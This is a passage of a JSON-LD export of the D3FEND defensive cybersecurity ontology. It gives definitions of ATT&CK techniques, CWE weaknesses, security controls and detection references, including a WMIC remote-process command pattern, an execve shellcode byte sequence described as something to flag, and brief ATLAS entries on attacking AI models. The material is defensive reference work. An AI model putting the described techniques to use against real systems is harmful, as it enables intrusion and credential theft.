        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-001/"
      },
      "d3f:kb-abstract": "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source UACME tool.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-001: UAC Bypass",
      "rdfs:label": "Reference - CAR-2019-04-001: UAC Bypass - MITRE"
    },
    {
      "@id": "d3f:CCI-001090_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents unauthorized and unintended information transfer via shared system resources.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001090"
    },
    {
      "@id": "d3f:ByteSequenceEmulation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ByteSequenceEmulation"
      ],
      "d3f:d3fend-id": "D3-BSE",
      "d3f:definition": "Analyzing sequences of bytes and determining if they likely represent malicious shellcode.",
      "d3f:kb-article": "## How it works\n\nBytes are analyzed as if they are machine code instructions, and such instructions that are a common component of known shellcode are noted, such as stack pivots, reads from a Memory Address Table, and system calls for functions that disable protections or execute code.  For example, the x86 instruction `b0 0b: mov $11, %ax`, with no further alterations to the `%ax` register, followed by `cd 80: syscall` executes the system call `execve()` in the Linux kernel, which replaces the current process with another one specified -- this is a common action in shellcode, so this sequence would be flagged.\n\nThis technique detects shellcode despite whether or not it would cause a buffer overflow in the target binary.\n\nIf the sequence of bytes contains a sequence similar to that used in malicious shellcode, the entire byte sequence is flagged and a follow-on technique may be invoked.\n\n## Considerations\n\n### False Negatives\nIf the shellcode instructions are far apart, simple implementations might not detect the shellcode.\n\nDue to the nature of assembly instructions not having a defined start or end, implementations which do not process all start sequences (for example, when they a find byte sequence of interest, continue scanning forwards from the end of it) might not detect the shellcode.\n\nThis technique might not detect more complex or obfuscated instructions.  For that purpose, Dynamic Analysis or Emulated File Analysis could assist by analyzing the actual instruction function.\n\nThis technique may not detect self-modifying code.  To make it harder for a process to modify itself, Process Segment Execution Prevention should be used, while noting its considerations.\n\nThis technique might not detect malicious shellcode which reuses instructions in the target binary for malicious effect, as memory references in the presumed assembly code are not dereferenced.  
Dynamic Analysis and Emulated File Analysis, when set up properly to fork from the running target binary, might detect this.  Process Segment Execution Prevention combined with Segment Address Offset Randomization frequently makes introduction of shellcode through overwriting a saved return pointer more difficult.  Call stack depth analysis might detect excessive reuse of instructions in the target binary.  Shadow Stack Frames might detect that a stack frame's return address has changed and Stack Frame Canary Verification might detect that the stack frame's return address was overwritten.  Other heuristic methods might detect jump-oriented programming shellcode.\n\nWhen code is inserted directly, not through a buffer overflow but at some place where code is executed, whether by a write to a file or by a write-what-where condition, the buffer overflow mitigations do not help.  Behavioral analysis could detect this, or proper access control could mitigate this.\n\n### False Positives\n\nByte sequences containing code that is never used as machine code are still analyzed and flagged for anomalies, and [eventually](http://mathforum.org/library/drmath/view/55871.html), it is likely that an attack sequence will arise from the sheer volume of bytes transmitted.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Network-BasedBufferOverflowDetectionByExploitCodeAnalysis_InformationSecurityResearchCentre"
        },
        {
          "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation"
        }
      ],
      "d3f:synonym": "Shellcode Transmission Detection",
      "rdfs:label": "Byte Sequence Emulation",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTrafficAnalysis"
      }
    },
    {
      "@id": "d3f:CWE-1110",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1110",
      "d3f:definition": "The product's design documentation does not adequately describe control flow, data flow, system initialization, relationships between tasks, components, rationales, or other important aspects of the design.",
      "rdfs:label": "Incomplete Design Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:T1176.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1176.001",
      "d3f:definition": "Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)",
      "rdfs:label": "Browser Extensions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1176"
      }
    },
    {
      "@id": "d3f:T1556.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1556.001",
      "d3f:definition": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.",
      "rdfs:label": "Domain Controller Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1556"
      }
    },
    {
      "@id": "d3f:CWE-1304",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1304",
      "d3f:definition": "The product performs a power save/restore operation, but it does not ensure that the integrity of the configuration state is maintained and/or verified between the beginning and ending of the operation.",
      "rdfs:label": "Improperly Preserved Integrity of Hardware Configuration State During a Power Save/Restore Operation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:CWE-763",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-763",
      "d3f:definition": "The product attempts to return a memory resource to the system, but it calls the wrong release function or calls the appropriate release function incorrectly.",
      "rdfs:label": "Release of Invalid Pointer or Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-404"
      }
    },
    {
      "@id": "d3f:CWE-165",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-165",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes multiple internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Multiple Internal Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-164"
      }
    },
    {
      "@id": "d3f:DS0029",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)",
      "d3f:exactly": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Network Traffic Content component",
      "rdfs:label": "Network Traffic (ATT&CK DS)"
    },
    {
      "@id": "d3f:CCI-002618_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization removes organization-defined firmware components (e.g., previous versions) after updated versions have been installed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002618"
    },
    {
      "@id": "d3f:created",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Date of creation of the resource.",
      "rdfs:label": {
        "@language": "en",
        "@value": "date created"
      },
      "rdfs:range": {
        "@id": "xsd:dateTime"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:date"
      }
    },
    {
      "@id": "d3f:DigitalEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A digital event represents an observable occurrence, action, or state change within digital systems, networks, or their interactions. These events are characterized by their impact on the confidentiality, integrity, availability, or functionality of digital resources, processes, identities, or communications. Digital events are essential units of information in cybersecurity, serving as the basis for detecting threats, analyzing anomalies, and orchestrating responses in complex, interconnected environments.",
      "rdfs:label": "Digital Event",
      "rdfs:subClassOf": {
        "@id": "d3f:Event"
      }
    },
    {
      "@id": "d3f:Reference-MaliciousRelayDetectionOnNetworks_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20150264083A1"
      },
      "d3f:kb-abstract": "A system and method for detecting malicious relay communications is disclosed. Network communications can be received and analyzed using such network components as a network switch. The received traffic can be parsed into sessions. Relay metadata can be extracted from the sessions and further be used to categorize the sessions into one or more types of relay metadata behaviors. Once a significant amount of sessions are detected an alarm may be triggered and/or alarm data may be generated for analysis by network security administrators.",
      "d3f:kb-author": "Ryan James PRENGER; Nicolas BEAUCHESNE; Karl Matthew LYNN",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting relay networks, i.e. an attacker outside of the organization's network takes control of an internal host to be used as a source of attacks against other internal targets or exfiltrate data out of the organization. In this defensive technique, metadata from collected network packet captures is extracted to categorize network sessions using known relay behaviors. Information such as the number of bytes sent to and from a potential internal relay host, time of session initiation, packet contents, packet size, flow direction, and packet arrival time statistics are used to categorize the sessions and identify relay behavior. This technique assumes that relay network connections' inter-packet arrival times exhibit a high degree of variance in comparison to standard client-to-server connections. If enough evidence of relay behavior is gathered about a given internal host, the host is identified as suspicious and an alert is generated.",
      "d3f:kb-organization": "VECTRA NETWORKS Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:RelayPatternAnalysis"
      },
      "d3f:kb-reference-title": "Malicious relay detection on networks",
      "rdfs:label": "Reference - Malicious relay detection on networks - VECTRA NETWORKS Inc"
    },
    {
      "@id": "d3f:T1200",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1200",
      "d3f:connects": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:definition": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.",
      "rdfs:label": "Hardware Additions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N3712d9bd53a54f49b71f5d065dd192ac"
        }
      ]
    },
    {
      "@id": "_:N3712d9bd53a54f49b71f5d065dd192ac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T1566.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1566.002",
      "d3f:definition": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.",
      "d3f:produces": [
        {
          "@id": "d3f:Email"
        },
        {
          "@id": "d3f:InboundInternetMailTraffic"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Spearphishing Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1566"
        },
        {
          "@id": "_:Ned84c7d6d96547fb881eafae1cd33b4e"
        },
        {
          "@id": "_:N17fcd30dbf9b4846a176b4953c296fe8"
        },
        {
          "@id": "_:Nfd9360926ca84691ac4ca8b1b411df8d"
        }
      ]
    },
    {
      "@id": "_:Ned84c7d6d96547fb881eafae1cd33b4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Email"
      }
    },
    {
      "@id": "_:N17fcd30dbf9b4846a176b4953c296fe8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetMailTraffic"
      }
    },
    {
      "@id": "_:Nfd9360926ca84691ac4ca8b1b411df8d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:use-limits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x use-limits y: The entity x specifies a designated number of uses beyond which some entity y cannot function or must be terminated.",
      "rdfs:label": "use-limits",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13781154-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:limits"
      }
    },
    {
      "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-03-002/"
      },
      "d3f:kb-abstract": "Adversaries may use Windows Management Instrumentation (WMI) to move laterally, by launching executables remotely.The analytic CAR-2014-12-001 describes how to detect these processes with network traffic monitoring and process monitoring on the target host. However, if the command line utility wmic.exe is used on the source host, then it can additionally be detected on an analytic. The command line on the source host is constructed into something like wmic.exe /node:\"\\<hostname\\>\" process call create \"\\<command line\\>\". It is possible to also connect via IP address, in which case the string \"\\<hostname\\>\" would instead look like IP Address.\n\nAlthough this analytic was created after CAR-2014-12-001, it is a much simpler (although more limited) approach. Processes can be created remotely via WMI in a few other ways, such as more direct API access or the built-in utility PowerShell.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:ProcessSpawnAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2016-03-002: Create Remote Process via WMIC",
      "rdfs:label": "Reference - CAR-2016-03-002: Create Remote Process via WMIC - MITRE"
    },
    {
      "@id": "d3f:CWE-75",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-75",
      "d3f:definition": "The product does not adequately filter user-controlled input for special elements with control implications.",
      "rdfs:label": "Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-74"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Automated Patch Management Tools",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "SI-2(4)"
    },
    {
      "@id": "_:N098d37dce77c4807a6e814485e83f584",
      "@type": "owl:AllDisjointClasses",
      "owl:members": {
        "@list": [
          {
            "@id": "d3f:Agent"
          },
          {
            "@id": "d3f:Artifact"
          },
          {
            "@id": "d3f:Event"
          },
          {
            "@id": "d3f:Goal"
          },
          {
            "@id": "d3f:Plan"
          },
          {
            "@id": "d3f:Weakness"
          }
        ]
      }
    },
    {
      "@id": "d3f:FileContentBlockData",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The actual content or main data within a file or data block.",
      "rdfs:label": "File Content Block Data",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:FileSystemMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Metadata about the files and directories in a file system.  For example file name, file length, time modified, group and user ids, and other file attributes.",
      "rdfs:label": "File System Metadata",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/File_system#Metadata"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Metadata"
      }
    },
    {
      "@id": "d3f:T1480.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1480.002",
      "d3f:definition": "Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)",
      "rdfs:label": "Mutual Exclusion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1480"
      }
    },
    {
      "@id": "d3f:DS0037",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications",
      "rdfs:comment": "This data source captures events relating to certificates and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Certificate (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1661",
      "@type": "owl:Class",
      "d3f:attack-id": "T1661",
      "d3f:definition": "An adversary may push an update to a previously benign application to add malicious code. This can be accomplished by pushing an initially benign, functional application to a trusted application store, such as the Google Play Store or the Apple App Store. This allows the adversary to establish a trusted userbase that may grant permissions to the application prior to the introduction of malicious code. Then, an application update could be pushed to introduce malicious code.(Citation: android_app_breaking_bad)",
      "rdfs:label": "Application Versioning - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Application Versioning"
    },
    {
      "@id": "d3f:CWE-832",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-832",
      "d3f:definition": "The product attempts to unlock a resource that is not locked.",
      "rdfs:label": "Unlock of a Resource that is not Locked",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:AML.T0043.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.001",
      "d3f:definition": "In Black-Box attacks, the adversary has black-box (i.e. [AI Model Inference API Access](/techniques/AML.T0040) via API access) access to the target model.\nWith black-box attacks, the adversary may be using an API that the victim is monitoring.\nThese attacks are generally less effective and require more inferences than [White-Box Optimization](/techniques/AML.T0043.000) attacks, but they require much less access.",
      "rdfs:label": "Black-Box Optimization - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Black-Box Optimization"
    },
    {
      "@id": "d3f:T1003.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1003.005",
      "d3f:definition": "Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)",
      "d3f:may-modify": {
        "@id": "d3f:Log"
      },
      "rdfs:label": "Cached Domain Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N3e9b307143d643c1a769a0a8662e3d8b"
        },
        {
          "@id": "_:N526552d49cd741d4aedbc69a7b35616a"
        }
      ]
    },
    {
      "@id": "_:N3e9b307143d643c1a769a0a8662e3d8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "_:N526552d49cd741d4aedbc69a7b35616a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Log"
      }
    },
    {
      "@id": "d3f:CCI-001425_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to change the value of associated security attributes.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-25T00:00:00"
      },
      "rdfs:label": "CCI-001425"
    },
    {
      "@id": "d3f:CWE-192",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-192",
      "d3f:definition": "Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types.",
      "rdfs:label": "Integer Coercion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:DNSLookup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Domain Name System (DNS) lookup is a record returned from a DNS resolver after querying a DNS name server.  Typically considered an A or AAAA record, where a domain name is resolved to an IPv4 or IPv6 address, respectively.",
      "rdfs:label": "DNS Lookup",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_Name_System"
        },
        {
          "@id": "dbr:List_of_DNS_record_types"
        },
        {
          "@id": "https://schema.ocsf.io/objects/dns_query"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:IntrinsicallySemi-supervisedLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ISSL",
      "d3f:definition": "These methods directly optimize an objective function with components for labeled and unlabeled samples and do not rely on any intermediate steps or supervised base learners. Basically, these methods are extension of existing supervised methods to include the effect of unlabeled data samples in the objective function.",
      "d3f:kb-article": "## References\nBeginner's Guide to Semi-Supervised Learning. Jashish Blog.  [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/).",
      "rdfs:label": "Intrinsically Semi-supervised Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:UDPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the User Datagram Protocol (UDP), providing a connectionless datagram service with minimal protocol mechanisms.",
      "rdfs:label": "UDP Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TransportLayerEvent"
      }
    },
    {
      "@id": "d3f:T1496",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496",
      "d3f:definition": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.",
      "rdfs:label": "Resource Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1555.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1555.006",
      "d3f:definition": "Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.",
      "rdfs:label": "Cloud Secrets Management Stores",
      "rdfs:subClassOf": {
        "@id": "d3f:T1555"
      }
    },
    {
      "@id": "d3f:CWE-524",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-524",
      "d3f:definition": "The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere.",
      "rdfs:label": "Use of Cache Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOTMFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOTM File"
    },
    {
      "@id": "d3f:CWE-918",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-918",
      "d3f:definition": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.",
      "d3f:synonym": [
        "SSRF",
        "XSPA"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Server-Side Request Forgery (SSRF)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-441"
        },
        {
          "@id": "_:Nfb2a6a7b8f104bc08309a3836fe89e8f"
        }
      ]
    },
    {
      "@id": "_:Nfb2a6a7b8f104bc08309a3836fe89e8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:CWE-135",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-135",
      "d3f:definition": "The product does not correctly calculate the length of strings that can contain wide or multi-byte characters.",
      "rdfs:label": "Incorrect Calculation of Multi-Byte String Length",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:T1521",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521",
      "d3f:definition": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.",
      "rdfs:label": "Encrypted Channel - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Encrypted Channel"
    },
    {
      "@id": "d3f:T1456",
      "@type": "owl:Class",
      "d3f:attack-id": "T1456",
      "d3f:definition": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring an [Application Access Token](https://attack.mitre.org/techniques/T1550/001).",
      "rdfs:label": "Drive-By Compromise - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "Drive-By Compromise"
    },
    {
      "@id": "d3f:CCI-001100_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents public access into the organization's internal networks except as appropriately mediated by managed interfaces employing boundary protection devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001100"
    },
    {
      "@id": "d3f:CodeRepository",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A code repository is a form of database where code, typically source code, is stored and managed.  In revision control systems, a repository is a data structure that stores metadata for a set of files or directory structure. Depending on whether the version control system in use is distributed like (Git or Mercurial) or centralized like (Subversion, CVS, or Perforce), the whole set of information in the repository may be duplicated on every user's system or may be maintained on a single server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Repository_(version_control)"
      },
      "rdfs:label": "Code Repository",
      "rdfs:subClassOf": {
        "@id": "d3f:Database"
      },
      "skos:altLabel": [
        "Repository",
        "Version Control Repository"
      ]
    },
    {
      "@id": "d3f:CWE-1419",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1419",
      "d3f:definition": "The product attempts to initialize a resource but does not correctly do so, which might leave the resource in an unexpected, incorrect, or insecure state when it is accessed.",
      "rdfs:label": "Incorrect Initialization of Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:GNSSTimeRecord",
      "@type": "owl:Class",
      "d3f:definition": "A GNSS Time Record is an information content entity encoded in a GNSS signal that represents the transmission time of that signal as determined by the transmitting satellite, expressed relative to a constellation-specific time standard and epoch.",
      "rdfs:label": "GNSS Time Record",
      "rdfs:seeAlso": {
        "@id": "https://gssc.esa.int/navipedia/index.php/Time_References_in_GNSS"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:TimeRecord"
      }
    },
    {
      "@id": "d3f:CCI-002284_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the integrity of organization-defined security attributes associated with organization-defined objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002284"
    },
    {
      "@id": "d3f:T0801",
      "@type": "owl:Class",
      "d3f:attack-id": "T0801",
      "d3f:definition": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.",
      "rdfs:label": "Monitor Process State - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Monitor Process State"
    },
    {
      "@id": "d3f:AML.TA0000",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0000",
      "d3f:definition": "The adversary is attempting to gain some level of access to an AI model.\n\nAI Model Access enables techniques that use various types of access to the AI model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.\nThe level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the AI model.\nThe adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.\n\nAccess to an AI model may require access to the system housing the model, the model may be publicly accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.",
      "rdfs:label": "AI Model Access - ATLAS",
